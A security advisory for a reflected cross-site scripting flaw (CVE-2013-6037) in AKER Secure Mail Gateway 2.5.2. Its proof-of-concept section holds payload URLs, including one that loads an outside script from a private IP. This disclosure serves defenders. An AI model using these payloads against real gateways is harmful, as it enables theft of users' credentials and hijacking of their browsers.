AKER Secure Mail Gateway 2.5.2 Cross Site Scripting

2014-03-07T00:00:00
ID PACKETSTORM:125599
Type packetstorm
Reporter William Costa
Modified 2014-03-07T00:00:00

Description

                                        
                                            `XSS in url for access of Confirmation Required in box for antispam from  
company AKER (CVE-2013-6037)  
  
I. VULNERABILITY  
-------------------------  
Reflected XSS vulnerabilities in AKER SECURE MAIL GATEWAY <= v2.5.2  
  
II. BACKGROUND  
-------------------------  
The Aker Secure Mail Gateway is a complete platform security e-mail  
  
III. DESCRIPTION  
-------------------------  
Has been detected a reflected XSS vulnerability in Aker Secure Mail Gateway  
<=2.5.2 , that allows the execution of arbitrary HTML/script code to be  
executed in the context of the victim user's browser.  
The code injection is done through the parameter "msg_id" and "content" in  
the page index.php.  
  
  
IV. PROOF OF CONCEPT  
-------------------------  
The application does not validate the double encoding of the "msg_id"  
parameter correctly. Malicious Request ("msg_id")  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script>alert(String(/XSS/).substr(1,6)  
); </script>  
Vulnerable:  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script  
src=http://10.0.1.142:5005/xook.js></script>  
Vulnerable:  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><iframe  
src=http://www.google.com> </iframe>  
  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser, this can leverage to steal sensitive information as user  
credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Aker Secure Mail Gateway <= v2.5.2  
  
VII. SOLUTION  
-------------------------  
http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp  
  
References  
  
http://www.kb.cert.org/vuls/id/687278  
http://www.aker.com.br/  
http://www.aker.com.br/produtos/aker-secure-mail-gateway  
http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All  
  
By Wiliam Costa  
`